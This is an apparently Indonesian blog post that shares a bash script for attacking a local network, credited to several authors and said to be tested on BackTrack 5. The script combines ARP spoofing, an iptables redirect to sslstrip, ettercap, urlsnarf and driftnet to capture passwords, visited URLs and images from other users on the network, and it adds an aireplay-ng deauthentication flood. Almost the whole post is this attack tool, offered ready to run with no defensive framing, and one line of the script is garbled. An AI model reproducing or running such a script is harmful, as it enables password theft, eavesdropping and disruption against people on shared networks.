Info BackTrack

Linux & Security Tutorial

Script Auto Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet


Save dalam format *sh , dan jangan lupa di  ‘chmod 755’.


#!/bin/bash

# Script for sniffing https connections.
# Arpspoof+Ettercap+SSLStrip=Your Password (MITM)
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT5
# BY gHero,cseven,spudgunman.
# Ver 0.3

# ASCII sniff.sh

#variable intro
luv1="[\e[01;38mw\e[00m]"
luv2="[\e[01;32mx\e[00m]"
luv3="[\e[01;34mi\e[00m]"
luv4="[\e[01;30m?\e[00m]"

#variable ip
gwBgt1="`ip route list | grep "default" | cut -d " " -s -f 5`"
gwBgt2="`ip addr show dev $gwBgt1 | awk '/ether/{ print $2 }'`"
gwBgt3="`ip route list | grep "default" | cut -d" " -f3`"
gwBgt4="`arping -I $gwBgt1 -f $gwBgt3| grep "Unicast" | cut -d" " -f5 | cut -d"[" -f2 | cut -d"]" -f1`"
gwBgt5="`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`" > /dev/null

echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
 /  ___//    \|  \   __\\   __\     /  ___/  |  \
 \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'

echo -e "$luv3 |===============================================================|"
echo -e "$luv3 |                                                               |"
echo -e "$luv3 |Tools ini merupakan tools autosniff password https ditambah    |"
echo -e "$luv3 |dengan deauth attack                                           |"
echo -e "$luv3 |                                                               |"
echo -e "$luv3 |========================INSTRUKSI==============================|"
echo -e "$luv3 |                                                               |"
echo -e "$luv3 |Ketik [get] untuk menyerang 1 target                           |"
echo -e "$luv3 |Tekan [enter] untuk seluruh target                             |"
echo -e "$luv3 |Tekan[destroy] untuk mengirim serangan deauth                  |"
echo -e "$luv3 |===============================================================|"
echo -e "$luv3 Info System: IP:$gwBgt5, MAC:$gwBgt4, GW:$gwBgt3, LanCard:$gwBgt1"
echo ""
echo -e "$luv scanning $gwBgt3/24 execute....."
nmap -sP  $gwBgt3/24 | grep "[0-9].[0-9].[0-9].[0-9]"
echo ""
echo ""
echo -e "$luv2 IP Forwarding...............done!"
echo -e "$luv2 Destination port to 80......done!"

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# Arpspoof

echo -n -e "$luv4 Apakah Anda mau sniffing satu kompi atau seluruh network ? ";
read racun
if [ "$racun" == "get" ] ; then
echo
echo -e '\E[30;42m'"<==senjata reload==>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"IP target Anda : "; tput sgr0
read gh41
echo -n -e '\E[30;47m'"Gateway target anda: "; tput sgr0
read gh42
echo -n -e '\E[37;44m'" tipe Interface yang Anda gunakan:$gwBgt1  "; tput sgr0
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$gwBgt1' -t '$gh41' '$gh42'' &

elif [ "$racun" == "destroy" ] ; then
echo
echo -e '\E[30;40m'"<==deauth reload==>"; tput sgr0
echo '------------------------'
echo -n -e '\E[33;41m'"Mac address target Anda : "; tput sgr0
read gh43echo       "$luv3 |Set Gateway to $gh42..ok |"

xterm -fg green4 -bg grey0 -e 'aireplay-ng --deauth 10000000000 -a $gh43 -c ff:ff:ff:ff:ff:ff eth0' &

else

echo
echo -e '\E[30;42m'""; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read gh42

echo -n -e '\E[37;44m'"Masukin tipe Interface Anda:$gwBgt1 "; tput sgr0

xterm -fg green4 -bg grey0 -e 'arpspoof -i '$gwBgt1' '$gh42'' &

fi

#SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

#ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$gwBgt1'' &

#URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$gwBgt1' | grep http > urlsnarf_log.txt' &

#DRIFTNET
driftnet -p -i $gwBgt1 &

—done

Sumber : http://dailycybergrind.blogspot.com/

Artikel Terkait:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: